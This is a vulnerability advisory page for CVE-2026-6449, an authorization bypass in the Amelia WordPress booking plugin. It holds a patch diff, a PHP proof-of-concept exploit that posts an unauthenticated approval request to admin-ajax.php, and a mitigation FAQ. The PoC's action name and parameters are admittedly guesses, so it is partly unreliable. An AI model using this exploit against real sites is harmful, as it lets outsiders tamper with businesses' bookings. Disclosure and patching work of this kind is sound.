-
-                if ($noShowTagEnabled && !in_array($booking->getCustomerId()->getValue(), $customersNoShowCountIds)) {
-                    $customersNoShowCountIds[] = $booking->getCustomerId()->getValue();
-                }
-            }
-
-            $appointmentAS->calculateAndSetAppointmentEnd($appointment, $service);
-
-            $minimumCancelTimeInSeconds = $settingsDS
-                ->getEntitySettings($service->getSettings())
-                ->getGeneralSettings()
-                ->getMinimumTimeRequirementPriorToCanceling();
-
-            $minimumCancelTime = DateTimeService::getCustomDateTimeObject(
-                $appointment->getBookingStart()->getValue()->format('Y-m-d H:i:s')
-            )->modify("-{$minimumCancelTimeInSeconds} seconds");
-
-            $date = $appointment->getBookingStart()->getValue()->format('Y-m-d');
-
-            $cancelable = $currentDateTime <= $minimumCancelTime;
-
-            $minimumRescheduleTimeInSeconds = $settingsDS
-                ->getEntitySettings($service->getSettings())
-                ->getGeneralSettings()
-                ->getMinimumTimeRequirementPriorToRescheduling();
-
-            $minimumRescheduleTime = DateTimeService::getCustomDateTimeObject(
-                $appointment->getBookingStart()->getValue()->format('Y-m-d H:i:s')
-            )->modify("-{$minimumRescheduleTimeInSeconds} seconds");
-
-            $reschedulable = $currentDateTime <= $minimumRescheduleTime;
-
-            $groupedAppointments[$date]['date'] = $date;
-
-            $groupedAppointments[$date]['appointments'][] = array_merge(
-                $appointment->toArray(),
-                [
-                    'cancelable'    => $cancelable,
-                    'reschedulable' => $reschedulable,
-                    'past'          => $currentDateTime >= $appointment->getBookingStart()->getValue()
-                ]
-            );
-        }
-
-        $emptyBookedPackages = null;
-
-        if (
-            !empty($params['packageId']) &&
-            empty($params['services']) &&
-            empty($params['providers']) &&
-            empty($params['locations']) &&
-            !$noResultsManagePackagesFilters
-        ) {
-            /** @var AbstractPackageApplicationService $packageApplicationService */
-            $packageApplicationService = $this->container->get('application.bookable.package');
-
-            /** @var Collection $emptyBookedPackages */
-            $emptyBookedPackages = $packageApplicationService->getEmptyPackages(
-                [
-                    'packageCustomerIds' => !empty($packageCustomerIds) ? $packageCustomerIds : [],
-                    'packages'           => [$params['packageId']],
-                    'purchased'          => !empty($params['dates']) ? $params['dates'] : [],
-                    'customers'          => $customers
-                ]
-            );
-        }
-
-        $customersNoShowCount = [];
-
-        if ($noShowTagEnabled && $customersNoShowCountIds) {
-            /** @var CustomerBookingRepository $bookingRepository */
-            $bookingRepository = $this->container->get('domain.booking.customerBooking.repository');
-
-            $customersNoShowCount = $bookingRepository->countByNoShowStatus($customersNoShowCountIds);
-        }
-
-
-        $result->setResult(CommandResult::RESULT_SUCCESS);
-        $result->setMessage('Successfully retrieved appointments');
-        $result->setData(
-            [
-                Entities::APPOINTMENTS     =>
-                !empty($params['asArray']) && filter_var($params['asArray'], FILTER_VALIDATE_BOOLEAN) ? $appointments->toArray() : $groupedAppointments,
-                'availablePackageBookings' => $availablePackageBookings,
-                'emptyPackageBookings'     => !empty($emptyBookedPackages) ? $emptyBookedPackages->toArray() : [],
-                'occupied'                 => $occupiedTimes,
-                'totalPackagePurchases'    => $totalPackagePurchases,
-                'customersNoShowCount'     => $customersNoShowCount
-            ]
-        );
-
-        return $result;
-    }
-}
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/ReassignBookingCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/ReassignBookingCommandHandler.php
@@ -616,6 +616,8 @@
                     $oldAppointment->getStatus()->getValue()
                 );

+                $newAppointment->setInternalNotes(new Description(''));
+
                 $newAppointmentId = $appointmentRepository->add($newAppointment);

                 $newAppointment->setId(new Id($newAppointmentId));
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentCommandHandler.php
@@ -13,7 +13,6 @@
 use AmeliaBookingApplicationServicesPaymentPaymentApplicationService;
 use AmeliaBookingApplicationServicesReservationAppointmentReservationService;
 use AmeliaBookingApplicationServicesUserUserApplicationService;
-use AmeliaBookingApplicationServicesZoomAbstractZoomApplicationService;
 use AmeliaBookingDomainCollectionCollection;
 use AmeliaBookingDomainCommonExceptionsAuthorizationException;
 use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
@@ -35,6 +34,7 @@
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
 use AmeliaBookingInfrastructureRepositoryBookingAppointmentAppointmentRepository;
 use AmeliaBookingInfrastructureRepositoryBookingAppointmentCustomerBookingRepository;
+use AmeliaBookingInfrastructureRepositoryPaymentPaymentRepository;
 use AmeliaBookingInfrastructureRepositoryUserProviderRepository;
 use AmeliaBookingInfrastructureRepositoryUserUserRepository;
 use AmeliaBookingInfrastructureWPTranslationsFrontendStrings;
@@ -87,8 +87,6 @@
         $bookableAS = $this->container->get('application.bookable.service');
         /** @var AbstractCustomFieldApplicationService $customFieldService */
         $customFieldService = $this->container->get('application.customField.service');
-        /** @var AbstractZoomApplicationService $zoomService */
-        $zoomService = $this->container->get('application.zoom.service');
         /** @var UserApplicationService $userAS */
         $userAS = $this->getContainer()->get('application.user.service');
         /** @var SettingsService $settingsDS */
@@ -125,30 +123,6 @@
             throw new AccessDeniedException('You are not allowed to update appointment');
         }

-        if (!empty($params['noteOnly'])) {
-            $appointmentId = (int)$command->getField('id');
-
-            $note = $command->getField('internalNotes');
-
-            $oldAppointment = $appointmentRepo->getById($appointmentId);
-
-            $appointmentRepo->updateFieldById($appointmentId, $note, 'internalNotes');
-
-            $result->setResult(CommandResult::RESULT_SUCCESS);
-            $result->setMessage('Successfully updated appointment note');
-            $result->setData([
-                Entities::APPOINTMENT => array_merge($oldAppointment ? $oldAppointment->toArray() : [], ['internalNotes' => $note]),
-                'appointmentStatusChanged' => false,
-                'appointmentRescheduled' => false,
-                'bookingsWithChangedStatus' => [],
-                'appointmentEmployeeChanged' => false,
-                'appointmentZoomUserChanged' => false,
-                'bookingAdded' => false
-            ]);
-
-            return $result;
-        }
-
         $this->checkMandatoryFields($command);

         $appointmentData = $command->getFields();
@@ -428,6 +402,43 @@
             $appointment->setChangedStatus(new BooleanValueObject(true));
         }

+        /** @var PaymentRepository $paymentRepository */
+        $paymentRepository = $this->container->get('domain.payment.repository');
+
+        $bookingIds = [];
+
+        /** @var CustomerBooking $booking */
+        foreach ($appointment->getBookings()->getItems() as $booking) {
+            if ($booking->getId() && $booking->getId()->getValue()) {
+                $bookingIds[] = $booking->getId()->getValue();
+            }
+        }
+
+        if ($bookingIds) {
+            /** @var Collection $payments */
+            $payments = $paymentRepository->getByCriteria(['bookingIds' => $bookingIds]);
+
+            /** @var CustomerBooking $booking */
+            foreach ($appointment->getBookings()->getItems() as $booking) {
+                if ($booking->getId() && $booking->getId()->getValue() && !$booking->getPayments()->length()) {
+                    $bookingPayments = new Collection();
+
+                    foreach ($payments->getItems() as $payment) {
+                        if (
+                            $payment->getCustomerBookingId() &&
+                            $payment->getCustomerBookingId()->getValue() === $booking->getId()->getValue()
+                        ) {
+                            $bookingPayments->addItem($payment, $payment->getId()->getValue());
+                        }
+                    }
+
+                    if ($bookingPayments->length()) {
+                        $booking->setPayments($bookingPayments);
+                    }
+                }
+            }
+        }
+
         $appointmentArray = $appointment->toArray();

         $oldAppointmentArray = $oldAppointment->toArray();
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentNoteCommand.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentNoteCommand.php
@@ -0,0 +1,14 @@
+<?php
+
+namespace AmeliaBookingApplicationCommandsBookingAppointment;
+
+use AmeliaBookingApplicationCommandsCommand;
+
+/**
+ * Class UpdateAppointmentNoteCommand
+ *
+ * @package AmeliaBookingApplicationCommandsBookingAppointment
+ */
+class UpdateAppointmentNoteCommand extends Command
+{
+}
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentNoteCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentNoteCommandHandler.php
@@ -0,0 +1,88 @@
+<?php
+
+namespace AmeliaBookingApplicationCommandsBookingAppointment;
+
+use AmeliaBookingApplicationCommandsCommandHandler;
+use AmeliaBookingApplicationCommandsCommandResult;
+use AmeliaBookingApplicationCommonExceptionsAccessDeniedException;
+use AmeliaBookingApplicationServicesUserUserApplicationService;
+use AmeliaBookingDomainCommonExceptionsAuthorizationException;
+use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
+use AmeliaBookingDomainEntityEntities;
+use AmeliaBookingDomainEntityUserAbstractUser;
+use AmeliaBookingDomainServicesSettingsSettingsService;
+use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
+use AmeliaBookingInfrastructureRepositoryBookingAppointmentAppointmentRepository;
+
+/**
+ * Class UpdateAppointmentNoteCommandHandler
+ *
+ * @package AmeliaBookingApplicationCommandsBookingAppointment
+ */
+class UpdateAppointmentNoteCommandHandler extends CommandHandler
+{
+    /**
+     * @param UpdateAppointmentNoteCommand $command
+     *
+     * @return CommandResult
+     * @throws AccessDeniedException
+     * @throws AuthorizationException
+     * @throws InvalidArgumentException
+     * @throws QueryExecutionException
+     */
+    public function handle(UpdateAppointmentNoteCommand $command)
+    {
+        $result = new CommandResult();
+
+        /** @var UserApplicationService $userAS */
+        $userAS = $this->getContainer()->get('application.user.service');
+        /** @var SettingsService $settingsDS */
+        $settingsDS = $this->container->get('domain.settings.service');
+        /** @var AppointmentRepository $appointmentRepo */
+        $appointmentRepo = $this->container->get('domain.booking.appointment.repository');
+
+        try {
+            /** @var AbstractUser $user */
+            $user = $command->getUserApplicationService()->authorization(
+                $command->getPage() === 'cabinet' ? $command->getToken() : null,
+                $command->getCabinetType()
+            );
+        } catch (AuthorizationException $e) {
+            $result->setResult(CommandResult::RESULT_ERROR);
+            $result->setData(['reauthorize' => true]);
+
+            return $result;
+        }
+
+        if ($userAS->isCustomer($user)) {
+            throw new AccessDeniedException('You are not allowed to update appointment');
+        }
+
+        if ($userAS->isProvider($user) && !$settingsDS->getSetting('roles', 'allowWriteAppointments')) {
+            throw new AccessDeniedException('You are not allowed to update appointment');
+        }
+
+        $appointmentId  = (int)$command->getArg('id');
+        $note           = $command->getField('internalNotes');
+        $oldAppointment = $appointmentRepo->getById($appointmentId);
+
+        if ($oldAppointment === null) {
+            $result->setResult(CommandResult::RESULT_ERROR);
+            $result->setMessage('Appointment not found');
+            return $result;
+        }
+
+        $appointmentRepo->updateFieldById($appointmentId, $note, 'internalNotes');
+
+        $result->setResult(CommandResult::RESULT_SUCCESS);
+        $result->setMessage('Successfully updated appointment note');
+        $result->setData([
+            Entities::APPOINTMENT => array_merge(
+                $oldAppointment->toArray(),
+                ['internalNotes' => $note]
+            ),
+        ]);
+
+        return $result;
+    }
+}
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentStatusCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentStatusCommandHandler.php
@@ -150,6 +150,8 @@
             $appointment->getProviderId()->getValue()
         );

+        $appointment->setService($service);
+
         if (
             $requestedStatus === BookingStatus::APPROVED &&
             (
--- a/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentTimeCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Appointment/UpdateAppointmentTimeCommandHandler.php
@@ -31,7 +31,6 @@
 use AmeliaBookingInfrastructureRepositoryBookingAppointmentCustomerBookingRepository;
 use AmeliaBookingInfrastructureRepositoryUserUserRepository;
 use AmeliaBookingInfrastructureWPTranslationsFrontendStrings;
-use InteropContainerExceptionContainerException;

 /**
  * Class UpdateAppointmentTimeCommandHandler
@@ -56,7 +55,6 @@
      * @throws InvalidArgumentException
      * @throws QueryExecutionException
      * @throws NotFoundException
-     * @throws ContainerException
      */
     public function handle(UpdateAppointmentTimeCommand $command)
     {
@@ -129,26 +127,28 @@
             }
         }

-        $minimumRescheduleTimeInSeconds = $settingsDS
-            ->getEntitySettings($service->getSettings())
-            ->getGeneralSettings()
-            ->getMinimumTimeRequirementPriorToRescheduling();
-
-        try {
-            $reservationService->inspectMinimumCancellationTime(
-                $appointment->getBookingStart()->getValue(),
-                $minimumRescheduleTimeInSeconds
-            );
-        } catch (BookingCancellationException $e) {
-            $result->setResult(CommandResult::RESULT_ERROR);
-            $result->setMessage('You are not allowed to update booking');
-            $result->setData(
-                [
-                    'rescheduleBookingUnavailable' => true
-                ]
-            );
+        if ($userAS->isCustomer($user)) {
+            $minimumRescheduleTimeInSeconds = $settingsDS
+                ->getEntitySettings($service->getSettings())
+                ->getGeneralSettings()
+                ->getMinimumTimeRequirementPriorToRescheduling();
+
+            try {
+                $reservationService->inspectMinimumCancellationTime(
+                    $appointment->getBookingStart()->getValue(),
+                    $minimumRescheduleTimeInSeconds
+                );
+            } catch (BookingCancellationException $e) {
+                $result->setResult(CommandResult::RESULT_ERROR);
+                $result->setMessage('You are not allowed to update booking');
+                $result->setData(
+                    [
+                        'rescheduleBookingUnavailable' => true
+                    ]
+                );

-            return $result;
+                return $result;
+            }
         }

         $bookingStart = $command->getField('bookingStart');
@@ -231,6 +231,14 @@

         $appointment->setRescheduled(new BooleanValueObject(true));

+        $appointment->setInitialBookingStart(
+            new DateTimeValue($initialBookingStart)
+        );
+
+        $appointment->setInitialBookingEnd(
+            new DateTimeValue($initialBookingEnd)
+        );
+
         $bookingAS->bookingRescheduled(
             $appointment->getId()->getValue(),
             Entities::APPOINTMENT,
@@ -252,11 +260,7 @@
         $result->setMessage('Successfully updated appointment time');
         $result->setData(
             [
-                Entities::APPOINTMENT        => $appointment->toArray(),
-                'initialAppointmentDateTime' => [
-                    'bookingStart' => $initialBookingStart->format('Y-m-d H:i:s'),
-                    'bookingEnd'   => $initialBookingEnd->format('Y-m-d H:i:s'),
-                ],
+                Entities::APPOINTMENT => $appointment->toArray(),
             ]
         );

--- a/ameliabooking/src/Application/Commands/Booking/Event/DeleteEventBookingCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Event/DeleteEventBookingCommandHandler.php
@@ -124,6 +124,8 @@
         do_action('amelia_before_event_booking_deleted', $customerBooking->toArray(), $event ? $event->toArray() : null);

         if (!$eventApplicationService->deleteEventBooking($customerBooking)) {
+            $customerBookingRepository->rollback();
+
             $result->setResult(CommandResult::RESULT_ERROR);
             $result->setMessage('Could not delete booking');

--- a/ameliabooking/src/Application/Commands/Booking/Event/DeleteEventsCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Event/DeleteEventsCommandHandler.php
@@ -6,12 +6,13 @@
 use AmeliaBookingApplicationCommandsCommandResult;
 use AmeliaBookingApplicationCommonExceptionsAccessDeniedException;
 use AmeliaBookingApplicationServicesBookingEventApplicationService;
-use AmeliaBookingDomainCollectionCollection;
 use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
 use AmeliaBookingDomainEntityEntities;
+use AmeliaBookingInfrastructureCommonExceptionsNotFoundException;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
 use AmeliaBookingInfrastructureRepositoryBookingEventEventRepository;
 use AmeliaBookingInfrastructureWPEventListenersBookingEventEventStatusUpdatedEventHandler;
+use MicrosoftGraphExceptionGraphException;

 /**
  * Class DeleteEventsCommandHandler
@@ -24,11 +25,11 @@
      * @param DeleteEventsCommand $command
      *
      * @return CommandResult
-     * @throws SlimExceptionContainerValueNotFoundException
      * @throws AccessDeniedException
      * @throws InvalidArgumentException
      * @throws QueryExecutionException
-     * @throws InteropContainerExceptionContainerException
+     * @throws NotFoundException
+     * @throws GraphException
      */
     public function handle(DeleteEventsCommand $command)
     {
@@ -59,12 +60,11 @@
             ]
         );

-        do_action('amelia_before_events_deleted', $events ? $events->toArray() : null);
+        do_action('amelia_before_events_deleted', $events->toArray());

         $eventRepository->beginTransaction();

         try {
-            /** @var Collection $updatedEvents */
             $updatedEvents = $eventApplicationService->updateStatus(
                 $events,
                 'rejected',
--- a/ameliabooking/src/Application/Commands/Booking/Event/GetEventBookingCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Event/GetEventBookingCommandHandler.php
@@ -197,6 +197,12 @@
                 'location' =>
                 $event->getCustomLocation() ?
                     ['name' => $event->getCustomLocation()->getValue()] : ($event->getLocationId() ? $event->getLocation()->toArray() : null),
+                'periods' => array_map(function ($period) {
+                    return [
+                        'periodStart' => $period['periodStart'],
+                        'periodEnd' => $period['periodEnd']
+                    ];
+                }, $event->getPeriods()->toArray()),
             ]
         );

--- a/ameliabooking/src/Application/Commands/Booking/Event/GetEventBookingsCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Event/GetEventBookingsCommandHandler.php
@@ -6,9 +6,11 @@
 use AmeliaBookingApplicationCommandsCommandResult;
 use AmeliaBookingApplicationCommonExceptionsAccessDeniedException;
 use AmeliaBookingApplicationServicesBookingEventApplicationService;
+use AmeliaBookingApplicationServicesCustomFieldAbstractCustomFieldApplicationService;
 use AmeliaBookingApplicationServicesPaymentPaymentApplicationService;
 use AmeliaBookingApplicationServicesUserProviderApplicationService;
 use AmeliaBookingApplicationServicesUserUserApplicationService;
+use AmeliaBookingDomainCollectionCollection;
 use AmeliaBookingDomainCommonExceptionsAuthorizationException;
 use AmeliaBookingDomainCommonExceptionsInvalidArgumentException;
 use AmeliaBookingDomainEntityBookingAppointmentCustomerBooking;
@@ -18,6 +20,7 @@
 use AmeliaBookingDomainEntityEntities;
 use AmeliaBookingDomainEntityUserAbstractUser;
 use AmeliaBookingDomainEntityUserProvider;
+use AmeliaBookingDomainFactoryBookingAppointmentCustomerBookingFactory;
 use AmeliaBookingDomainFactoryBookingEventEventFactory;
 use AmeliaBookingDomainServicesDateTimeDateTimeService;
 use AmeliaBookingDomainServicesSettingsSettingsService;
@@ -25,6 +28,7 @@
 use AmeliaBookingDomainValueObjectsStringBookingStatus;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
 use AmeliaBookingInfrastructureRepositoryBookingAppointmentCustomerBookingRepository;
+use AmeliaBookingInfrastructureRepositoryCustomFieldCustomFieldRepository;
 use Exception;

 /**
@@ -58,8 +62,12 @@
         $eventApplicationService = $this->container->get('application.booking.event.service');
         /** @var CustomerBookingRepository $bookingRepository */
         $bookingRepository = $this->container->get('domain.booking.customerBooking.repository');
+        /** @var CustomFieldRepository $customFieldRepository */
+        $customFieldRepository = $this->container->get('domain.customField.repository');
         /** @var ProviderApplicationService $providerAS */
         $providerAS = $this->container->get('application.user.provider.service');
+        /** @var AbstractCustomFieldApplicationService $customFieldService */
+        $customFieldService = $this->container->get('application.customField.service');

         $params = $command->getField('params');

@@ -217,6 +225,7 @@
         $bookings = $bookingRepository->getEventBookingsByIds(
             $bookingIds,
             array_merge(
+                !empty($params['sort']) ? ['sort' => $params['sort']] : [],
                 !empty($params['dates']) ? ['dates' => $params['dates']] : [],
                 [
                     'fetchBookingsPayments' => true,
@@ -229,6 +238,9 @@
         );


+        /** @var Collection $customFieldsCollection */
+        $customFieldsCollection = $customFieldRepository->getAll([], false);
+
         $customersNoShowCountIds = [];

         $noShowTagEnabled = $settingsDS->isFeatureEnabled('noShowTag');
@@ -236,6 +248,8 @@
         $eventBookings = [];

         foreach ($bookings as &$booking) {
+            $customFields = [];
+
             ksort($booking['payments']);

             if ($noShowTagEnabled) {
@@ -281,6 +295,7 @@

             $wcTax = 0;
             $wcDiscount = 0;
+            $paid = 0;

             foreach ($booking['payments'] as $payment) {
                 $paymentAS->addWcFields($payment);
@@ -288,8 +303,16 @@
                 $wcTax += !empty($payment['wcItemTaxValue']) ? $payment['wcItemTaxValue'] : 0;

                 $wcDiscount += !empty($payment['wcItemCouponValue']) ? $payment['wcItemCouponValue'] : 0;
+
+                $paid = $paid + $payment['amount'];
             }

+            $customFields = $customFieldService->reformatCustomField(
+                CustomerBookingFactory::create($booking),
+                $customFields,
+                $customFieldsCollection
+            );
+
             $eventBooking = [
                 'id' => $booking['id'],
                 'bookedSpots' => $persons,
@@ -329,10 +352,13 @@
                 'payment' => [
                     'status' => $paymentAS->getFullStatus($booking, BookableType::EVENT),
                     'total'  => $paymentAS->calculateAppointmentPrice($booking, BookableType::EVENT) + $wcTax - $wcDiscount,
+                    'paid'   => $paid,
                 ],
+                'customFields' => $customFields,
                 'payments' => array_values($booking['payments']),
                 'qrCodes' => !empty($booking['qrCodes']) ? $booking['qrCodes'] : null,
                 'cancelable' => $eventApplicationService->isCancelable(EventFactory::create($booking['event']), $user),
+                'created' => !empty($booking['created']) ? explode(' ', $booking['created'])[0] : null,
             ];

             if ($isCabinetPage) {
--- a/ameliabooking/src/Application/Commands/Booking/Event/GetEventCommandHandler.php
+++ b/ameliabooking/src/Application/Commands/Booking/Event/GetEventCommandHandler.php
@@ -21,7 +21,6 @@
 use AmeliaBookingDomainEntityBookingEventEventTicket;
 use AmeliaBookingDomainEntityEntities;
 use AmeliaBookingDomainEntityUserAbstractUser;
-use AmeliaBookingDomainEntityUserProvider;
 use AmeliaBookingDomainValueObjectsNumberIntegerIntegerValue;
 use AmeliaBookingDomainValueObjectsStringBookingStatus;
 use AmeliaBookingInfrastructureCommonExceptionsQueryExecutionException;
@@ -90,6 +89,9 @@
         /** @var CustomFieldRepository $customFieldRepository */
         $customFieldRepository = $this->container->get('domain.customField.repository');

+        $fetchBookings =
+            empty($command->getFields()['params']['bookings']) ||
+            filter_var($command->getFields()['params']['bookings'], FILTER_VALIDATE_BOOLEAN);

         /** @var Event $event */
         $event = $eventApplicationService->getEventById(
@@ -100,13 +102,14 @@
                 'fetchEventsTags'       => empty($command->getFields()['params']['drawer']),
                 'fetchEventsProviders'  => empty($command->getFields()['params']['drawer']),
                 'fetchEventsImages'     => true,
-                'fetchBookings'         => true,
-                'fetchBookingsTickets'  => true,
-                'fetchBookingsUsers'    => true,
-                'fetchBookingsPayments' => true,
-                'fetchBookingsCoupons'  => true,
+                'fetchBookings'         => $fetchBookings,
+                'fetchBookingsTickets'  => $fetchBookings,
+                'fetchBookingsUsers'    => $fetchBookings,
+                'fetchBookingsPayments' => $fetchBookings,
+                'fetchBookingsCoupons'  => $fetchBookings,
                 'fetchEventsOrganizer'  => true,
                 'fetchEventsLocation'   => true,
+                'fetchOccupancy'        => !$fetchBookings,
             ]
         );

@@ -173,6 +176,15 @@
         $bookingsPrice = 0;
         $paidPrice     = 0;

+        $customersIds = [];
+
+        /** @var CustomerBooking $booking */
+        foreach ($event->getBookings()->getItems() as $booking) {
+            $customersIds[] = $booking->getCustomerId()->getValue();
+        }
+
+        $customersNoShowCount = $customersIds ? $bookingRepository->countByNoShowStatus($customersIds) : [];
+
         /** @var CustomerBooking $booking */
         foreach ($event->getBookings()->getItems() as $booking) {
             $customFields   = [];
@@ -211,11 +223,6 @@
             }
             $paidPrice += $bookingPaidPrice;

-            $noShowCount = $bookingRepository->countByNoShowStatus([$booking->getCustomerId()->getValue()]);
-            if ($noShowCount && !empty($noShowCount[$booking->getCustomerId()->getValue()])) {
-                $noShowCount = $noShowCount[$booking->getCu

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6449 - Booking for Appointments and Events Calendar – Amelia <= 2.1.2 - Unauthenticated Authorization Bypass via Remote Approval Endpoint

// Configuration - Set these variables
$target_url = 'http://example.com';  // Target WordPress site URL
$booking_id = 1;                      // ID of the booking in 'waiting' status to approve

// Endpoint for WordPress admin-ajax
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// The AJAX action for Amelia remote approval (adjust if custom)
$action = 'amelia_approve_booking_remotely';

// Construct the payload
// Note: The vulnerability allows unauthenticated access, so no cookies or nonces are required.
$payload = array(
    'action' => $action,
    'appointmentId' => $booking_id,
    // Additional parameters may be needed depending on the plugin's implementation.
    // The token parameter is intentionally omitted because the vulnerability bypasses its validation.
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

// Send the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

// Display results
echo "HTTP Status Code: " . $http_code . "n";
if ($error) {
    echo "cURL Error: " . $error . "n";
} else {
    echo "Response:n";
    echo $response . "n";
}

// Check for success - the response may contain JSON indicating the booking was approved
if ($http_code == 200) {
    $data = json_decode($response, true);
    if (isset($data['status']) && $data['status'] === 'success') {
        echo "[+] Booking successfully approved (status: 'approved'?).n";
    } else {
        echo "[!] Response received but status unknown. Check the output above.n";
    }
} else {
    echo "[-] Request failed. The site may be patched or the booking doesn't exist.n";
}

?>

Frequently Asked Questions

What is CVE-2026-6449?
Overview of the vulnerability
CVE-2026-6449 is a medium severity vulnerability in the Amelia booking plugin for WordPress, affecting versions up to and including 2.1.2. It allows unauthenticated attackers to bypass authorization checks and approve bookings that are in a ‘waiting’ status by sending crafted requests to the admin-ajax endpoint.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a logical flaw in the authorization logic within the plugin’s code. When a booking is in ‘waiting’ status, the authorization check is skipped, allowing any unauthenticated user to approve the booking without proper validation.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Amelia booking plugin version 2.1.2 or earlier is affected. Site administrators should check their plugin version and update if they are running a vulnerable version.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Amelia plugin installed on your WordPress site. If it is version 2.1.2 or earlier, your site is at risk and should be updated immediately.
How can I fix or mitigate this issue?
Updating the plugin
The vulnerability has been patched in version 2.3 of the Amelia plugin. To mitigate the issue, update the plugin to the latest version as soon as possible. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized actions on the site, such as approving bookings.
What practical risks does this vulnerability pose?
Potential impacts on operations
Successful exploitation of this vulnerability could allow unauthorized users to approve bookings, leading to scheduling conflicts, unauthorized confirmations, and potential financial losses. It could disrupt business operations and damage trust with customers.
What is a proof of concept (PoC)?
Demonstration of the vulnerability
A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC illustrates how an attacker can send a crafted request to the admin-ajax endpoint to approve a booking without authentication.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Amelia plugin until an update can be applied. Additionally, restrict access to the admin-ajax endpoint using server-level controls or security plugins.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating the plugin, ensure that your WordPress installation and all other plugins are up to date. Regularly review user permissions, implement strong authentication methods, and consider using a web application firewall.
How can I stay informed about future vulnerabilities?
Keeping up with security news
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow security blogs, and monitor the official WordPress security updates. Regularly review CVE databases for new vulnerabilities affecting your plugins.
What is the role of the community in addressing vulnerabilities?
Importance of reporting and collaboration
The community plays a crucial role in identifying and reporting vulnerabilities. Users are encouraged to report any discovered issues to plugin developers and share information with the community to enhance overall security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations